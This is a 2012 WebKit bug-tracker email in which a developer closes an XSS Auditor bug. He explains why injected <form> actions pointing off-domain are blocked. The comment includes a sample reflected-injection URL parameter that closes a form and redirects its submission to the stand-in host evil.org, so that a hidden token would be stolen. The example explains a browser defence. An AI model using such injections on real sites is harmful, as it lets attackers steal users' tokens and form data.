[Webkit-unassigned] [Bug 72585] XSS Auditor : <form> action is blocked even if it is not a JavaScript URL
bugzilla-daemon at webkit.org
bugzilla-daemon at webkit.org
Mon Feb 27 10:36:22 PST 2012
https://bugs.webkit.org/show_bug.cgi?id=72585
Thomas Sepez <tsepez at chromium.org> changed:
What |Removed |Added
----------------------------------------------------------------------------
Status|NEW |RESOLVED
Resolution| |WONTFIX
--- Comment #3 from Thomas Sepez <tsepez at chromium.org> 2012-02-27 10:36:21 PST ---
Looking at this old XSSAuditor bug, I think that blocking form actions to off-domain http locations when a <form> is injected is the right thing to do (i.e. we need to block more than just the javascript URLs as Adam sugests in Comment #1). Just so we're all on the same page, the case I'm considering (apologies if this is obvious) is when page contains:
<form action="http://good.com">
<input type="text" name="quantity" value="2">
<input type="hidden" name="formkey" value="91812727123812">
<input type="submit">
</form>
and the "quantity" input element contains an injection, and we reflect from the URL say
...?quantity="></form><form action="http://evil.org">
resulting in page:
<form action="http://good.com">
<input type="text" name="quantity" value=""></form><form action="http://evil.org">
<input type="hidden" name="formkey" value="91812727123812">
<input type="submit">
</form>
So when the user hits submit, we steal his formkey token (or other information from input fields).
Please re-open if you disagree, or if you find that this is being triggered in the absence of both a reflected "<form" tag and a reflected "action" attribute.
Thanks heaps.
--
Configure bugmail: https://bugs.webkit.org/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are the assignee for the bug.
More information about the webkit-unassigned
mailing list